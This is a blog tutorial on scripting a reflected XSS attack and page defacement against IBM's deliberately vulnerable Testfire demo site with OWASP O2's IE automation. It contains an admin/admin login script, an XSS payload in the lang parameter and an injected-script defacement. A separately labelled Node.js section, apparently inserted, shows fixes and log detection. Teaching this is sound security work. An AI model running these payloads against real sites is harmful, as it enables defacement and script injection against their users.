The power of O2 scripting
Dinis Cruz is the creator of O2. He was kind enough to give me a lesson on O2 Internet Explorer automated scripting. This is a really powerful tool and, I think, will in the future be the end deliverable that software security testers hand to their clients. The tool recreates the vulnerability step by step in an automated fashion.
Let’s get started creating your automated XSS script for IBM’s demo Testfire application. In a previous post we showed that the lang variable was vulnerable to XSS, and we exploited it manually with both IBM AppScan and O2’s XSS creator.
First you are going to need to install O2. O2 is free and open source and is also an OWASP project.
Once you download the tool you will need to sync up the scripts.
Click on Custom O2 scripts.
Dinis created an O2 script for my engagement and my business, Parsons Software Security Consulting, LLC. We will drag and drop the Matt Parsons v0.1 (Custom O2).h2 script onto the logo.
This is the user interface of O2.
We are going to want to double click on IE Automation. Dinis told me that this part of O2 received a lot of traction at OWASP Brazil and that they were really excited about it.
Below are the default scripts.
The default page is http://www.google.com.
Below is the sample script.
var ie = panel.add_IE().silent(true);
ie.open("http://www.google.com");

//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll

It’s basically scripted in C#.
Here is the first script Dinis created.
var ie = panel.add_IE().silent(true);
ie.open("http://demo.testfire.net");
if (ie.hasLink("Sign In"))
{
    ie.link("Sign In").click();
    ie.field("uid").value("admin");
    ie.field("passw").value("admin");
    ie.button("Login").click();
}
else
    ie.link("MY ACCOUNT").click();
return ie.fields();

This script opens the IBM demo web site and logs you in as admin; admin is one of the users on the IBM test site.
This welcomes you as an admin user.
Next we are going to launch an XSS attack on the lang variable that our web site scanner found vulnerable.

// the IE panel is created as in the first script, so that ie is defined
var ie = panel.add_IE().silent(true);
ie.open("http://demo.testfire.net");
if (ie.hasLink("Sign In"))
{
    ie.link("Sign In").click();
    ie.field("uid").value("admin");
    ie.field("passw").value("admin");
    ie.button("Login").click();
}
else
    ie.link("MY ACCOUNT").click();
ie.link("Customize Site Language").click();
ie.link("International").click();
var currentUrl = ie.url();
// the payload is appended to the current URL, i.e. to the existing lang value
var xssPayload = "aaa><script> alert('xss')</script>";
ie.open(currentUrl + xssPayload);
return currentUrl;

See the XSS alert.
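The script above works because the page echoes whatever arrives in the lang parameter straight back into its markup, and the payload is simply appended to the existing lang value in currentUrl. What follows is an added example, not code from this post or from the O2 project: a small Node.js sketch of that reflection pattern, an output-encoded version, an allowlist-plus-encoding version (a language code is a closed set, so validation is the natural fix), and a check that pulls the lang value out of access-log lines the way a reviewer would when hunting for this pattern. The page fragment, the allowlist of language values and the log lines are constructed assumptions; the demo site’s real server code is not shown anywhere in the post.

```javascript
// Added example (not from the post or the O2 project): the reflection pattern
// behind the "lang" XSS, two hardened renderings, and a log check for the pattern.
// The page fragment, allowlist and log lines below are constructed for illustration.

// Constructed allowlist of language values the page is assumed to support.
const SUPPORTED_LANGS = new Set(["international", "english", "french", "german"]);
const DEFAULT_LANG = "international";

// Encode the five characters that let text break out of an HTML text node
// or attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable pattern: the query parameter is echoed straight into the markup,
// so "aaa><script>...</script>" becomes live script in the response.
function renderLanguageVulnerable(lang) {
  return `<p>Current Language: ${lang}</p>`;
}

// Output encoding alone: the value is still echoed, but can no longer form tags.
function renderLanguageEncoded(lang) {
  return `<p>Current Language: ${escapeHtml(lang)}</p>`;
}

// Hardened: validate against the allowlist and fall back to the default;
// encoding is kept as defence in depth.
function renderLanguageSafe(lang) {
  const chosen = SUPPORTED_LANGS.has(lang) ? lang : DEFAULT_LANG;
  return `<p>Current Language: ${escapeHtml(chosen)}</p>`;
}

// The lang value as the server sees it when the automation script appends its
// payload to currentUrl: the payload lands inside the existing parameter.
function langFromUrl(url) {
  return new URL(url).searchParams.get("lang");
}

// True when a reflected value carries characters a language code never needs.
function looksLikeMarkupInjection(value) {
  return /[<>"']/.test(value);
}

// Constructed access-log lines in "METHOD request-target protocol" shape; the
// second is the request the O2 script produces, percent-encoded by the browser.
const SAMPLE_LOG = [
  "GET /bank/customize.aspx?lang=international HTTP/1.1",
  "GET /bank/customize.aspx?lang=internationalaaa%3E%3Cscript%3E%20alert(%27xss%27)%3C/script%3E HTTP/1.1",
  "GET /bank/main.aspx HTTP/1.1",
  "GET /bank/customize.aspx?lang=english HTTP/1.1",
];

// Return the log lines whose lang parameter looks like a markup injection.
function flagSuspiciousLangRequests(logLines) {
  const flagged = [];
  for (const line of logLines) {
    const m = /^\S+\s+(\S+)/.exec(line);
    if (!m) continue;
    // The origin is a placeholder; only the path and query of the log entry matter.
    const lang = new URL(m[1], "http://placeholder.invalid").searchParams.get("lang");
    if (lang !== null && looksLikeMarkupInjection(lang)) flagged.push(line);
  }
  return flagged;
}

// Stand-alone demonstration using the URL construction from the post.
const CURRENT_URL = "http://demo.testfire.net/bank/customize.aspx?lang=international";
const PAYLOAD = "aaa><script> alert('xss')</script>";
const reflected = langFromUrl(CURRENT_URL + PAYLOAD);
console.log("vulnerable:", renderLanguageVulnerable(reflected));
console.log("encoded:   ", renderLanguageEncoded(reflected));
console.log("allowlist: ", renderLanguageSafe(reflected));
console.log("flagged:   ", flagSuspiciousLangRequests(SAMPLE_LOG));
```

The allowlist version is the one to ship: the encoded version still reflects attacker-controlled text, which is harmless in an HTML text node but stays a hazard if the same value is later placed in a URL or a script block.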
Now with this script we are going to do some serious XSS defacement.
panel.clear();
var ie = panel.add_IE().silent(true);
ie.open("http://demo.testfire.net/bank/customize.aspx?lang=international");
var target = ie.elements("P").str("Curent Language: international ");
target.flash();
target.injectHtml("beforeBegin",
    "<h1>O2 Platform Demos</h1>" +
    "The best way to learn about the security vulnerabilities of this website is to use the <a href=\"http://o2platform\">OWASP O2 Platform</a>" +
    "<script DEFER> " +
    " //alert(document.links[0].href);" +
    " document.links[0].href = \"http://o2platform.com\";" +
    " document.images[0].src = \"http://o2platform.com/images/a/a0/6_22_2010_7_08_23_PM_tmp9E4.jpg\";" +
    " //alert(document.images[0].sec);" +
    " //document.images[1].href = " +
    " //alert(document.images[1].href);" +
    "</script>");

//O2File:WatiN_IE_ExtensionMethods.cs
//using O2.XRules.Database.Utils.O2
//O2Ref:WatiN.Core.1x.dll
Now remember that all of this is automated. It goes through each of the steps to create the defacement.
If you have any questions e-mail me at mparsons1980@gmail.com
I couldn’t reproduce this payload here; I think it’s because of the quotes inside the href, so I simplified it to:

target.injectHtml("beforeBegin", "O2 Platform Demos" +
    "The best way to learn about the security vulnerabilities of this website is to use the " +
    "OWASP O2 Platform");
Thiago
December 2, 2010 at 2:36 pm